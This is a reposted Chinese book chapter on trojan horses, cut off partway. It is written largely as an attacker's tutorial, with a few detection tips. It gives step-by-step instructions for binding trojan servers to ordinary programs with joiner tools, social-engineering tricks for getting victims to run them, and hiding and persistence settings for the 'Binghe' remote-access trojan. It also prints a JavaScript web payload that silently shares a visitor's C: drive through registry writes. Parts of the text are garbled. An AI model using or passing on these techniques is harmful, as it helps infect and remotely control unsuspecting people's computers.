深度剖析木马的植入与攻击

发布时间:2021-12-07 16:01:51

深度剖析木马的植入与攻击
安全问题 2010-09-18 13:57:43 阅读 54 评论 0 字号:大中小 订阅

为了学*转的:
第 3 章 深度剖析木马的植入与攻击 ● 木马是如何实施攻击的 ● 木马的植入与隐藏 ● 木马信息反馈 ● 常用木马例说 ● 木马的清除和防范 木马,也称特伊洛木马,英文名称为 Trojan。其本身就是为了入侵个人电脑而开发的,藏在电脑中和工作的时候是很隐蔽的,它的运行和黑客的入侵不会在电脑的屏 幕上显示出任何痕迹。Windows 本身没有监视网络的软件,所以不借助其它工具软件,许多时候是很难知道木马的存在和黑客的入侵的。 由于很多新手对安全问题了解不多,所以并不知道自己的计算机中了“木马”该如何清除。虽然现在市面上有很多新版杀毒软件都可以自动清除“木马”,但它们并 不能防范新出现的“木马”程序,因此最关键的还是要知道“木马”的工作原理,这样就会很容易发现自己是否中“木马”了。 3-1 木马是如何实施攻击的 木马是黑客最常用的攻击方法,因此,在本章中将使用较大篇幅来介绍木马的攻防技术。木马的危害性在于它对电脑系统强大的控制和破坏能力、窃取密码、控制系 统操作、进行文件操作等,一台计算机一旦被一个功能强大的木马植入,攻击者就可以像操作自己的计算机一样控制这台计算机,甚至可以远程监控这台计算机上的 所有操作。 尽管资深的黑客是不屑于使用木马的,但在对网络安全事件的分析统计里,却发现有相当部分的网络入侵是通过木马来进行的,包括 2002 年微软被黑一案,据说就 是通过一种普通的蠕虫木马侵入微软的系统,并且窃取了微软部分产品源代码的。 3-1-1 木马是如何侵入系统的 小博士,你好!可以给我讲一下木马是如何侵入系统的吗? 没问题,一般的木马都有客户端和服务器端两个执行程序,其中客户端用于攻击者远程控制植入木马的计算机,服务器端程序就是通常所说的木马程序。攻击者要通 过木马攻击计算机系统,他所做的第一步就是要把木马的服务器端程序植入到被攻击的计算机里面。 目前木马入侵的主要途径,还是先通过一定的方法把木马执行档案弄到被攻击者的计算机系统里,如浏览网页、收看邮件、下载信息时,通过一定的提示故意误导被 攻击者打开执行档案,比如故意谎称这是个木马执行档案是朋友送给自己贺卡,可能在打开这个档案后,确实有贺卡的画面出现,但这时木马却已经悄悄在自己的后 台执行了。 一般的木马执行档案非常小,大多都是几 K 到几十 K,如果把木马连接到正常档案上,是很难发现的,所以有一些网站提供的软件下载往往是连接了木马档案的,在 执行这些下载的档案时,也同时执行了木马。 木马也可以通过 Script、ActiveX 及 ASP、CGI 交互脚本的方式植入,由于微软的 IE 浏览器在执行 Script 脚本上存在一些漏洞,攻击者可以利用这些漏洞传播病毒和 木马,甚至直接对浏览者计算机进行档案操作等控制,前不久就出现一个利用微软 Scripts 脚本漏洞对浏览者硬盘进行格式化的 Html 网页。 如果攻击者有办法把木马执行档案上传到攻击计算机的一个可执行 WWW 目录夹里面,他就可以通过编写 CGI 程序在攻击计算机上执行木马目录。 木马还可以利用系统的一些漏洞进行植入,如微软著名的 IIS 服务器溢出漏洞,通过一个 IISHACK 攻击程序即可使 IIS 服务器崩溃,并且同时攻击服务器执行远程木 马执行档案。 木马在被植入攻击计算机后,它一般会通过一定的方式把入侵计算机的信息发送给攻击者(如计算机的 IP 地址、木马植入的端口等) ,这样攻击者有这些信息才能够 与木马里应外合,控制攻击计算机。 早期的木马大多都是通过发送电子邮件的方式把入侵信息告诉攻击者,有一些木马档案干脆把计算机所有的密码用邮件的形式通知给攻击者,这样攻击时就不用直接 连接被攻击计算机即可获得一些重要数据,如攻击 QQ 密码的 GOP 木马即是如此。 使用电子邮件的方式对攻击者来说并不是最好的一种选择,因为如果木马被发现,则可能通过这个电子邮件的地址找出攻击者。现在还有一些木马采用的是通过发送 UDP 或者 ICMP 数据包的方式通知攻击者。 由于任何木马都有一个服务端程序,要对一台目标机进行远程控制都必须将服务端程序送入目标机,并诱骗目标机执行该程序。这是用木马进行远程控制中的重要一 步,也是很有技巧的一步。 3-1-2 木马是如何实施攻击的 木马可以以任何形式出现,可能是任何由用户或客户引入到系统中的程序。其提供或隐藏了一些功能,这些功能可以泄漏一些系统的私有信息或者控制该系统,这样, 它实际上就潜伏着很大的危险性。 通常木马采取六个步骤实施攻击。 配置木马(伪装木马)→传播木马(通过 E-mail 或者下载)→运行木马(自动安装、自启动)→信息泄漏(通过 E-mail、IRC 或 QQ 的方式使自己的信息泄露出去) →建立连接→远程控制,如图 3-1 所示。 图 3-1 木马攻击的步骤 至此,木马就彻底掌握了主动权,而你,就坐以待毙吧!

3-1-3 木马可以造成什么危害 鉴于木马严重的危害,很多人对木马知识还是有一定了解的,这对木马的传播起了一定的抑制作用,这是木马设计者所不愿见到的,因此他们开发了多种功能来伪装 木马,以达到降低用户警觉,欺骗用户的目的。 1.修改图标 当在 E-MAIL 的附件中看到这个图标时,是否会认为这是个文本文件呢?但在这里不得不告诉大家,这也有可能是个木马程序。 现在已经有木马可以将木马服务端程序的图标改成 HTML、TXT、ZIP 等各种文件的图标,这有相当大的迷惑性。不过目前提供这种功能的木马还不多见,并且这种 伪装也不是无懈可击的,所以不必整天提心吊胆、疑神疑鬼。 2.捆绑文件 这种伪装手段是将木马捆绑到一个安装程序上,当安装程序运行时,木马在用户毫无察觉的情况下,偷偷的进入了系统。至于被捆绑的文件一般是可执行文件(即 EXE、COM 一类的文件) 。 3.出错显示 有一定木马知识的人都知道:如果打开一个文件没有任何反应,这很可能就是个木马程序。木马的设计者也意识到了这个缺陷,所以已经有木马提供了一个叫做出错 显示的功能。当服务端用户打开木马程序时,会弹出一个错误提示框(这当然是假的) ,错误内容可自由定义,大多会定制成一些诸如“文件已破坏,无法打开的!” 之类的信息,当服务端用户信以为真时,木马却悄悄侵入了系统。 4.定制端口 很多老式的木马端口都是固定的,这给判断是否感染木马带来了方便,只要查一下特定的端口就知道感染了什么木马。所以现在很多新式的木马都加入了定制端口的 功能,控制端用户可以在 1024~65535 之间任选一个端口作为木马端口(一般不选 1024 以下的端口) ,这样就给判断所感染木马类型带来了麻烦。 5.自我销毁 这项功能是为了弥补木马的一个缺陷。由于当服务端用户打开含有木马的文件后,木马 会将自己拷贝到 Windows 的系统文件夹中(一般位于 C:\windows\system (Windows 9X)或 C:\WINNT\system32(WindowsNT/2000)目录下) ,一般来说原木马文件和系统文件夹中的木马文件的大小是一样的(捆绑文件的木马除外) , 那么中了木马的朋友只要在*来收到的信件和下载的软件中找到原木马文件 ,再根据原木马的大小去系统文件夹中查找相同大小的文件 判断一下哪个是木马就行了。 , 而木马的自我销毁功能是指安装完木马后,原木马文件将自动销毁,这样服务端用户就很难找到木马的来源,在没有查杀木马工具的帮助下,就很难删除木马了。 6.木马重命名 安装到系统文件夹中的木马文件名一般是固定的,那么只要根据一些查杀木马的文章,按图索骥在系统文件夹查找特定的文件,就可以断定中了什么木马。 所以,现在有很多木马都允许控制端用户自由定制安装后的木马文件名,这样就很难判断所感染的木马类型了。 3-1-4 网页木马制作例说 会使木马的人有成千上万,但是有很多人却不明白应该怎么把木马植入到对方的电脑,随着计算机的普及,在网络上相信很少有人会再轻易地接收对方的文件了,所 以网页木马就诞生了。 其实网页木马应该算是 HTML 带动同路径下一个 exe 文件的主页,也就是当浏览器浏览这个页面的时候,一个 exe 的文件就在后台自动下载并执行了。 可以做一个 test.html 的文件在桌面上,内容如下: 再在桌面上随便找个 exe 文件,名字一定要改为 tset.exe,好了,这时双击刚才生成的 HTML 文件,当看到“网页加载中,请稍候??”时,就可以看到那个同路径 下的 exe 文件也被无条件执行了,这种页面的优点就是编译修改简单,但在申请下了一个个人主页空间,并且把这两个文件上传上去,当试图通过浏览器浏览自己杰 作的时候,IE 的安全警告就会跳出来,大约是没有几个人愿意乖乖冒着风险去单击【是】按钮的吧! 好了,不管这个网页木马在本地是多么的完美,但是放到了网上就通不过 IE 的安全策略了,这个小马只好宣告失败。 还有就是通过 IE 自身的漏洞写入注册表,相信很多人经常在浏览一些主页的时候,注册表被改的乱七八糟、IE 标题被改、首页被改、注册表编辑器被禁用等,这些 都是自动修改了用户注册表网页的杰作。 所以,也可以做个页面让浏览者的硬盘完全共享,也是做个 HTML 文件,具体内容如下: script language=javascript> document.write(""); function f(){ a1=document.applets[0]; a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Shl = a1.GetObject(); Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\ RWC$\\Flags",402,"REG_DWORD"); Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\ RWC$\\Type",0,"REG_DWORD" ); Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\ RWC$\\Path","C:\\"); }

function init() { setTimeout("f()", 1000); } init(); 当对方在浏览过这个页面的时候,他的 C:就被共享了,共享后的进入方法就不用说了,但虽然被共享了,却还不知道谁正在看自己的这个页面,他的 IP 又是多少, 没有关系,有个很简单的方法,去 163 申请一个域名的转换,如 http://www.jdxh.com,然后连接到目标地址里就可以了。这种网页木马的特点是比*踩⑶一共 易被对方发现,但是操作起来却比较麻烦,需要牵扯到很多的东西。 3-2 木马的植入与隐藏 在 Windows 系统下,木马可以通过注册表、Win.ini、system.ini、Autoexec.bat 和 Config.sys、捆绑替换系统文件、启动菜单及程序配置.ini 文件来自我启动运行。 ① Win.ini:[WINDOWS]下面,"run="和"load="行是 Windows 启动时要自动加载运行的程序项目; ② System.ini:[BOOT]下面有个"shell=Explorer.exe"选项。正确的表述方法就是这样。如果等号后面不仅仅是 Explorer.exe,而是"shell=Explorer.exe 程序名",那 么后面跟着的那个程序就是木马程序; ③ 注册表:在 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\下面五个以 Run 开头的主键目录都是系统自启的键值。 当然,还可以通过木马程序一般都是和其他正常的程序捆绑在一起的特性,来侵入别人的主机。例如把特洛伊木马程序合成在小游戏程序中,当受攻击者下载这个小 游戏并将其执行时,木马程序就会在后台悄悄地工作,从而侵入受攻击者的主机。 那这样一来,用户的主机岂不是很危险吗?尽管如此,在黑客横行的网络世界中,这也是没有办法的事。唯一能够做的就是尽力维护好自己的系统,安装或升级到最 新版的防火墙,了解最前沿的病毒与木马资讯,做好一切防范措施。 下面介绍几种常见的伪装植入的方法。 1.直接发送式欺骗 将木马服务端程序直接发给对方,对方运行后,结果毫无反应(运行木马后的典型表现) ,对方说:“怎么打不开呀!”回答:“哎呀,不会程序是坏了吧?”或者说: “对不起,我发错了!”然后把正确的东西(正常游戏、图片等)发给对方,他收到后只顾高兴就不想刚才为什么会出现那种情况了。 2.捆绑欺骗 把木马服务端和某个游戏或工具捆绑成一个文件在 QQ 或邮件中发给别人,别人运行后它们往往躲藏在 Windows 的系统目录下,图标伪装成一个文本文件或者网页 文件,通过端口与外界进行联系。然后把自己和一些 EXE 文件捆绑在一起,或者采用改变文件关联方式的方法,来达到自动启动的目的。而且,即使以后系统重装 了,如果该程序还保存着,就还有可能再次中招。 3.文件夹惯性点击 把木马文件伪装成文件夹图标后,放在一个文件夹中,然后在外面再套三四个空文件夹,很多人出于连续点击的*惯,点到那个伪装成文件夹木马时,也会收不住鼠 标点下去,这样木马就成功运行了。 4.危险下载点 攻破一些下载站点后,下载几个下载量大的软件,捆绑上木马,再悄悄放回去让别人下载,这样以后每增加一次下载次数,就等于多了一台中木马的计算机。或者把 木马捆绑到其他软件上,然后“正大光明”地发布到各大软件下载网站,它们也不查毒,就算查也查不出一些新木马。 5.邮件冒名欺骗 该类木马植入的前提是,用匿名邮件工具冒充好友或大型网站、机构单位向别人发木马附件,别人下载附件并运行的话,就中木马了。 6.QQ 冒名欺骗 该类木马植入的前提是,必须先拥有一个不属于自己的 QQ 号。然后使用这个 QQ 号码给好友们发去木马程序,由于信任被盗号码的主人,好友们会毫不犹豫地运行 木马程序,结果就中招了。 7.ZIP 伪装 将一个木马和一个损坏的 ZIP 包(可自制)捆绑在一起,然后指定捆绑后的文件为 ZIP 图标,这样一来,除非别人看了他的后缀,否则单击下去将和一般损坏的 ZIP 没什么两样,根本不知道其实已经有木马在悄悄运行了。 ZIP 伪装的常见做法如下:首先创建一个文本文档,输入任意个字节(其实一个就行,最小)将它的扩展名 txt 直接改为 zip 即可,然后把它和木马程序捆绑在一起, 修改捆绑后的文件图标为 zip 图标就可以了。 下面就来主要介绍一下如何把木马程序和其他程序捆绑起来。 3-2-1 利用合成工具 Exebinder 伪装木马 利用 Exebinder 软件可以把两个可执行程序捆绑成一个程序,执行捆绑后的程序就等于同时执行了两个程序。而且它会自动更改图标,使捆绑后的程序和捆绑前的程 序图标一样,做到天衣无缝,并且还可以自动删除运行时导出的程序文件。这样就可以把自己的程序和其它软件捆绑起来,使其悄悄地在后台运行。 该软件的使用方法如下: ① 运行软件后,单击【可执行文件 1】按钮,选择一个程序 (如 C:\PWIN98\NOTEPAD.exe) ,如图 3-2 所示;

② 单击【可执行文件 2】按钮,选择另一个程序(如某远程控制软件的服务端程序 D:\ updatev3b6d40.exe) ,如图 3-3 所示; ③ 再单击【目标文件】为捆绑好的文件选择一个路径及文件名(如 D:\Notepad.exe) ,如图 3-4 所示,最后直接单击【捆绑】按钮,即可完成捆绑操作了。 之后就可以看到捆绑后的文件,运行 D:\Notepad.exe 即等于同时运行 C:\PWin98\Notepad.exe 与 D:\Server.exe 两个程序。 图 3-2 选择一个程序 图 3-3 选择另一个程序 图 3-4 完成捆绑操作 特别提示: ① 应该把被捆绑的程序指定为“执行文件 1”,把想捆绑上的程序指定为“执行文件 2”,把捆绑后生成的文件指定为“目标文件”。 ② 软件会自动提取“执行文件 1”的图标,使“目标文件”的图标与“执行文件”的图标一样,做到天衣无缝。 ③ 建议将“目标文件”的文件名指定为与“执行文件 1”相同,更加具有隐蔽性。 ④ “执行文件 1”、“执行文件 2”、“目标文件”三个文件必须指定为三个不同的文件,也就是说“目标文件”不能直接指定为“执行文件 1”,软件不能直接对 “可执行文件 1”进行覆盖。 3-2-2 用合成工具 ExeJoine 伪装木马 黑客最常用的是一个名为“ExeJoiner”的程序,它可以将两个 exe 文件合并,之后如果一执行这个“混合体”,便会同时执行合拼的两个程序。因为 NetBus 的服 务器程序在执行后是没有反应的,所以对方只会以为是执行了另一个普通的程序! 简便易行的使用界面让黑客们趋之若鹜,而绝大多数防毒软件还未把它列为病毒,exejoiner 可以用来掩饰安装木马的行为,是一件相当危险的黑客工具!!! 该文件合成工具 ExeJoiner 由两个文件组成:ExeJoiner.exe 和 pilot.dat,但 ExeJoiner 工具的两个文件是缺一不可的,当把 pilot.dat 删除的时候,执行 ExeJoiner 的合成功能时,程序会提示 pilot.dat 缺少。 用文件合成工具 ExeJoiner 伪装木马的方法如下: ① 打开 ExeJoiner 工具,就会出现它的主操作界面。 ② 在【Exe 1 path】中单击【Browse】按钮,找出想合拼的文件(例如 NetBus 的服务器端程序) 。或在【Exe 2 path】中单击【Browse】按钮,找出想合拼的文件 (例如一些小玩意的程序) 。在这里单击第一个【Browse】按钮,打开文件选择对话框。 ③ 在文件选择对话框中选择小游戏程序,单击【打开】按钮,ExeJoiner 会给出提示表明第一个可执行文件选择成功。 ④ 用同样的方法,单击第二个【Browse】按钮,选择要合成的第二个可执行文件,这里选择木马 BackOrifice2000 服务器端的程序,文件名为 BO2K.EXE。 ⑤ 选中要合成的两个文件之后,单击 ExeJoiner 工具界面上的[JOIN]按钮,如果成功合成,则会出现合并提示对话框。 ⑥ 这时就可以在 ExeJoiner 工具所在的文件夹中看到合成后的可执行文件 patched.exe 了 该可执行文件合成了一个小游戏程序和 BackOrifice2000 的服务器端程序 , 。 由于特洛伊木马执行时是没有任何反应的,而防毒软件又不能把它检测出来,所以对方只会以为执行了一普通的程序,中标也就难免了。 据说目前还没有有效的防御方法可以对付它,因此,只有提醒读者注意*时不要打开来历不明的邮件,不要执行可疑的文件,防患于未然。 3-2-3 利用万能文件捆绑器伪装木马 万能文件捆绑器可以将多个不同类型(如把 a.exe 和 b.jpg)的文件捆绑成一个可执行文件,运行捆绑后的程序会以当前系统默认的打开方式打开。并且可以自定义 哪个捆绑的文件不打开只释放(如 b.exe 必须要 b.dll 这个文件才能运行,那么可以先增加 b.dll,再增加 b.exe,让 b.dll 不打开,这样捆绑后就成了一个程序了,且 能正常运行) ;同时可以自定捆绑后程序的图标。 万能文件捆绑器的操作界面如图 3-5 所示。 图 3-5 万能文件捆绑器的操作界面 如果单击【增加文件】按钮即可增加要捆绑的文件,然后单击【捆绑文件】按钮将选定的几个文件捆绑成一个程序,这时出现一个保存对话框,生成的文件扩展名可 以是.exe、.com、.bat 三种类型的文件,如图 3-6 所示,用户可以根据自己的需要设置保存时的文件名和保存路径,最后点击【保存】按钮即可生成。 图 3-6 【保存捆绑文件】对话框 当然了,在单击【捆绑文件】按钮之前,用户还可以点击【选择图标】按钮,为自己的捆绑文件指定喜爱的图标。 如果在如图 3-5 所示中取消“要捆绑的文件”中“打开”前面的“√”,即可将该文件设置为只释放不打开状态。 3-2-4 利用合成工具 Joine 伪装木马 另外的一个合成工具 Joine 也是由两个文件组成,其中 Joiner.exe 为该工具的主程序,而 Readme.txt 则是其说明文件。 使用文件合成工具 Joine 伪装木马的方法如下: ① 需要先双击主程序 Joiner.exe,打开主界面。 ② 在 Joiner 工具界面的【First executable】文本框中,输入某个小游戏程序的路径和程序名称。或者单击文本框右边的文件夹图标 ,打开【选择文件】对话框,在 该对话框中,选择小游戏程序。 ③ 在【Second file】下面的文本框中,填入木马程序的路径和程序名称,同样,也可以单击文本框右边的文件夹图标 ,在【打开】对话框中选择木马程序。 ④ 这时再单击 Joiner 工具界面的【Join】按钮,程序合并的任务就完成了,这时在 Joiner 所在的文件夹中就会出现一个 result.exe 文件,该文件就是由小游戏程序 和木马程序合并的新程序,因此可以看到,它的大小比合并前的两个文件中的任何一个都要大。 3-2-5 利用网页木马生成器伪装木马

有些黑客喜欢在自己制作的网页上捆绑木马,然后将其上传到网站上,接着到一些论坛或是 QQ 上大肆宣传自己的网页,诱惑用户去访问。只要用户访问了这个捆绑 了木马的网页,自己就被种上了木马了。 网页木马生成器的使用非常简单,只要选择一个木马文件和一个网页文件就可以进行生成了,如图 3-7 所示。 具体需要填写的步骤如下: ① 打开 2004html.exe 在第一个栏里填上:http://你的网址/木马文件名。 ② 在第二栏里填上:http://你的网址/木马文件名.js。 ③ 在第三栏里填上木马文件的大小(这里是按照字节计算大小的,用鼠标在木马文件*从壹闶粜跃涂梢钥吹侥韭砦募淖纸诹耍谔畹氖焙虿灰樱拧 ④ 单击【生成】按钮之后,就会生成两个文件:一个 JS 文件这个不可以重命名,一个 newtimes.htm 文件,这个可以重命名。然后把生成的两个文件连同自己的木 马文件一起上传到自己的空间就可以了。 当用户点击这个捆绑了木马的网页链接(如网上的一个 RAR 文件)时,将会同时弹出一个文件下载的对话框,如图 3-8 所示,如果点击【打开】按钮,将会直接运 行木马程序,如果点击【保仔】按钮,保存在某个文件夹后,当用户好奇地以为是什么好东东而点击【打开】按钮时,木马程序也一样会被植入其计算机中。 对于不可信的文件下载,千万不能直接点击【打开】按钮,如果你对此很好奇,可以先保存到本地后,用杀毒软件和木马清除软件扫描无毒后,再打开。 这种方法是利用 IE 的 MIME 漏洞,这是 2001 年黑客中最流行的手法,不过目前有所减少,一方面许多人都改用 IE6.0(未打补丁的 IE6.0 以前版本都存在 MIME 漏 洞) ;另一方面,大部分个人主页空间都不允许上传.eml 文件了。 图 3-7 网页木马生成器运行主界面 图 3-8 【文件下载】对话框 MIME(Multipurpose Internet Mail Extentions) ,一般译作“多用途的网络邮件扩充协议”。是一种技术规范,原用于电子邮件,现在也可以用于浏览器。使用此协 议后,IE 可以直接播放网页中所包含的声音、动画等,如果木马伪装成这类文件,就可以让浏览者在不知不觉中种上黑客的木马。 3-2-6 如何隐藏自己的木马服务器程序 在前面讲过,木马程序的名字通常都与 Windows 的系统文件名相似,而且通常都隐藏在 System32 或者 Windows 目录下,这样做主要是为了迷惑别攻击者。隐藏木 马服务器程序最常用的方法就是对其客户端程序进行设置和修改,从而得到隐藏的目的。 下面就以冰河为例来对其进行一下说明,具体操作步骤如下: ① 运行“冰河”客户端程序 G_Client.exe 将弹出如图 3-9 所示的冰河 V8.4 操作界面。 ② 单击其工具条上的【配置本地服务器程序】按钮,如图 3-10 所示。 图 3-9 【冰河 V8.4 版】窗口 图 3-10 【工具栏】的一部分 ③ 这时就可以看到会弹出一个如图 3-11 所示的【服务器配置】对话框。 ④ 选择其中的【待配置文件】 ,只要单击其后面的【...】按钮,将会弹出如图 3-12 所示的【打开】对话框。 ⑤ 选择待配置文件 G_Server.exe 后,单击【打开】按钮就可以隐藏木马程序了。 图 3-11 【服务器配置】对话框 图 3-12 【打开】对话框 【基本设置】选项卡选项说明如下。 ●【安装路径】 :可以从【SYSTEM】【WINDOWS】【TEMP】三个选项中选择其中的一个,从这里就可以看出“冰河”的隐身地只有这么几处。 、 、 ●【文件名称】 :在这里可以更改为任意名字,从这里可以看出木马服务器程序的名称不是固定的。 ●【进程名称】 :变成 Windows 系统进程主要是为了迷惑被攻击者。 ●【访问口令】 :如果还没有创建这个访问口令是不能与木马服务器程序通讯的。 ●【自动删除安装文件】 :选中该复选框,则在运行 G_Server.exe 之后,该文件将被自动删除。这里顺便提醒大家一下:并不是所有中了“冰河”的计算机都有 G_Server.exe 存在与对方的计算机中,因此许多时候,利用【开始】→【查找】菜单命令根本就不能找到它。 【自我保护】选项卡 ●【自我保护】选项卡的主界面如图 3-13 所示,在该窗口中,主要包括以下几项: ●【写入注册表/启动项】 :只要选中了该复选框,则目标计算机以后每次重新启动的时候都将会自动运行木马服务器程序。 图 3-13 【自我保护】选项卡 ● 【 键 名 】: 在 这 里 可 以 输 入 任 意 键 名 。 从 这 里 可 以 看 到 写 入 注 册 表 的 键 名 不 是 固 定 的 , 但 是 目 录 却 是 固 定 的 , 即 : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ Current Version\sun。 ●【关联】 :只要选中了该复选框,以后即使木马服务器程序被删除了,如果对方运行了 Notepad.exe(记事本程序) ,它就又会重新安装“冰河”服务器程序了。 ●【关联类型】 :选择关联文件类型。 ●【关联文件名】 :选择关联的程序,如 Notepad.exe。 通过以上的叙述,可以看到“冰河”服务器程序的隐蔽性并不是很高明,因此只要知道了它常用的隐藏方法,想找到它还是很容易的,清除起来自然也就不难了。其 他木马程序的隐藏方式与“冰河”类似,有兴趣的话,大家不妨自己查查看。 下面再来介绍黑客使用的另一种隐藏方法,其实就是把木马服务器程序 G_Server.exe 同其他程序绑定在一起。因为木马程序运行时在桌面不会有任何明显的反应, 因此在运行绑定程序时,看到的只是另一个程序的运行情况。 绑定两个程序的具体操作步骤如下:

① 确定将被绑定的两个程序,一个是木马的服务器程序 G_Server.exe,另一个为合法程序,如记事本程序,如图 3-14 所示。 图 3-14 确定要绑定的程序 ② 再运行 Exebinder 文件捆绑机程序,将弹出【EXE 捆绑机 1.5 版】窗口,如图 3-15 所示。 ③ 选择两个将要绑定的程序、图标和生成文件,在选择好之后,就可以直接单击【捆绑】按钮来完成绑定了,捆绑完成后的结果如图 3-16 所示。 图 3-15 【EXE 捆绑机】窗口 图 3-16 捆绑后的文件 3-2-7 木马程序的启动与发现 在 Windows 系统下,木马可以通过注册表、Win.ini、System.ini、Autoexec.bat 和 Config.sys、连接替换系统档案、启动菜单及程序配置.ini 档案来自我启动执行。 Win.ini:[WINDOWS]下面,"run="和"load="行是 Windows 启动时要自动加载执行的程序项目 System.ini:[BOOT]下面有个"shell=Explorer.exe"项。正确的表述方法 就是这样。 如果等号后面不仅仅是 explorer.exe,而是"shell=Explorer.exe 程序名",那么后面跟着的那个程序就是木马程序。 注册表:在 KEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\下面五个以 Run 开头的主键目录都是系统自主启动的关键数值。 对于一些常见的木马,如 SUB7、BO2000、冰河等,它们都是采用打开 TCP 端口监听和写入注册表启动等方式,使用 Clean 之类的软件可以检测到这些木马,最新 版天网个人防火墙也提供强大的木马检测和清除功能。 这些检测木马的软件大多都是利用检测 TCP 连结、注册表等信息来判断是否有木马入侵,这也可以通过手工来探测。 如果发现自己的硬盘老没缘由的读取,软盘灯经常自己亮起,网络连接及鼠标、屏幕出现异常现象,很可能就是因为有木马潜伏在了自己的计算机里面。 这时最简单的方法就是使用 netstat 命令查看: Proto Local Address Foreign Address State TCP dddd-gam68abjr9:1662 202.106.184.200:http ESTABLISHE TCP dddd-gam68abjr9:1694 TCE-E-7-182-210.bta.net.cn:http TCP dddd-gam68abjr9:1702 202.106.184.200:http ESTABLISHE TCP dddd-gam68abjr9:1823 202.106.184.158:http CLOSE_WAIT TCP dddd-gam68abjr9:1824 202.106.184.158:http CLOSE_WAIT 从左到右依次是连接类型、本地连接地址端口、远程连接地址端口、连接状态,可以通过这个命令发现所有网络连接,如果这是有攻击者通过木马连接,则可以通过 这些信息发现异状。通过端口扫描的方法也可以发现一些弱智的木马,特别是一些早期的木马,它们连接的端口不能更改的,通过扫描这些固定的端口也可以发现木 马是否被植入。 还可以通过手工检测上文所述的和木马启动的系统档案以及注册表的方式,把那些不明白的自行启动执行档案清除掉。如果在发生系统异常后,最好将网络线断离再 诊断木马。 3-3 木马信息反馈 所谓木马配置程序将就信息反馈的方式或地址进行设置,如设置信息反馈的邮件地址、IRC 号、QQ 号等。一般来说,所有设计成熟的木马都有一个信息反馈机制。 所谓信息反馈机制是指木马成功安装后会收集一些服务端的软硬件信息,并通过 E-mail、IRC 或 QQ 的方式告知控制端用户,如图 3-17 所示就是一个典型的信息反 馈邮件。 从如图 3-17 所示的这封邮件中可以知道服务端的一些软硬件信息,包括使用的操作系统、系统目录、硬盘分区情况、系统口令等,在这些信息中,最重要的是服务 端 IP,因为只有得到这个参数,才能使控制端与服务端建立连接。 服务端用户运行木马或捆绑木马的程序后,木马就会自动进行安装。首先将自身复制到 Windows 的系统文件夹中(一般位于 C:\windows\system(Windows 9X) 或 C:\WINNT\system32(Windows NT/2000)目录下) ,然后在注册表,启动组,非启动组中设置好木马的触发条件,这样木马的安装就完成了,安装后就可以启 动该木马了。 当木马被激活后,就会进入内存,并开启事先定义的木马端口,准备与控制端建立连接。这时服务端用户可以在 MS-DOS 方式下,键入 NETSTAT -AN 查看端口状 态,一般个人电脑在脱机状态下是不会有端口开放的,如果有端口开放,就要注意是否感染木马了。 下面来介绍一下木马连接是如何建立的,一个木马连接的建立首先必须满足两个条件: ① 是控制端、服务端都要在线; ② 是服务端已安装了木马程序。 这两个条件缺一不可,在这个基础上控制端就可以通过木马端口与服务端建立连接了。为便于说明这里采用如图 3-18 所示的方式来对其加以讲解。 在如图 3-18 所示中 A 机为控制端,B 机为服务端,对 A 机来说如果想与 B 机建立连接就必须知道 B 机的木马端口和 IP 地址,这时候,由于 A 机事先设定了木马端 口,因此该项是已知项,所以这里最重要的是如何获得 B 机的 IP 地址。 要想获得 B 机的 IP 地址可以采用信息反馈和 IP 扫描两种方法。 图 3-17 一个典型的信息反馈邮件 图 3-18 建立连接 这里再重点介绍一下 IP 扫描技术: 因为 B 机装有木马程序,所以它的木马端口 7626 是处于开放状态的,现在 A 机只要扫描 IP 地址段中 7626 端口开放的主机就行了,如图 3-18 所示 B 机的 IP 地址 是 202.102.47.56,当 A 机扫描到这个 IP 时发现它的 7626 端口是开放的,那么这个 IP 就会被添加到列表中,这时 A 机就可以通过木马的控制端程序向 B 机发出连

接信号,B 机中的木马程序收到信号后立即作出响应,当 A 机收到响应的信号后,开启一个随即端口 1037 与 B 机的木马端口 7626 建立连接,到这时一个木马连接 才算真正建立。 值得一提的是:要扫描整个 IP 地段显然费时费力,一般来说控制端都是先通过信息反馈获得服务端的 IP 地址,由于拨号上网的 IP 是动态的,即用户每次上网的 IP 都是不同的,但是这个 IP 是在一定范围内变动的,如图 3-3-2 所示中 B 机的 IP 是 202.102.47.56,那么 B 机上网 IP 的变动范围是在 202.102.000.000~ 202.102.255.255,所以每次控制端只要搜索这个 IP 地址段就可以找到 B 机了。 木马连接建立后,在控制端端口和木马端口之间就将会出现一条通道,如图 3-19 所示。 这时候,控制端上的控制端程序就可以借着这条通道与服务端上的木马程序取得联系,并通过木马程序对服务端进行远程控制了。 图 3-19 控制端端口和木马端口之间将会出现一条通道 小博士,你好,虽然这时候取得了对该服务端的远程控制权限,但我却不知道自己具体都能够想有哪些控制权限?你可以给我介绍一下吗? 好的,其实这时候你所拥有的控制权限,远比想象的要大得多。 控制端具体能享有的控制权限如下: ① 窃取密码 一切以明文的形式或缓存在 Cache 中的密码都能被木马侦测到,此外很多木马还提供有击键记录功能,它能够记录服务端每次敲击键盘的动作,所以一旦有木马入 侵,密码将很容易被窃取。 ② 文件操作 控制端可通过远程控制对服务端上的文件进行删除、新建、修改、上传、下载、运行、更改属性等一系列操作,基本涵盖了 Windows *台上所有的文件操作功能。 ③ 修改注册表 控制端可任意修改服务端注册表,包括删除、新建或修改主键、子健、键值。有了这项功能,控制端就可以禁止服务端软驱,光驱的使用,锁住服务端的注册表,将 服务端上木马的触发条件设置得更隐蔽的一系列高级操作。 ④ 系统操作 这项内容包括*艋蚬乇辗穸瞬僮飨低常峡穸送缌樱刂品穸说氖蟊辍⒓蹋嗍臃穸俗烂娌僮鳎榭捶穸私痰龋刂贫松踔量梢运媸备 端发送信息。 3-3-1 扫描装有木马程序的计算机 要想实现木马信息的反馈,就需要在安装完木马服务器程序之后,利用该木马的客户端程序来访问目标计算机,以取得被攻击者的各种信息数据。在访问木马服务器 程序之前,一般都要先进行搜索。下面仍然以“冰河”为例,来对如何访问目标计算机进行一些说明。 具体操作步骤如下: ① 运行“冰河”客户端程序 G_Client.exe。 ② 单击 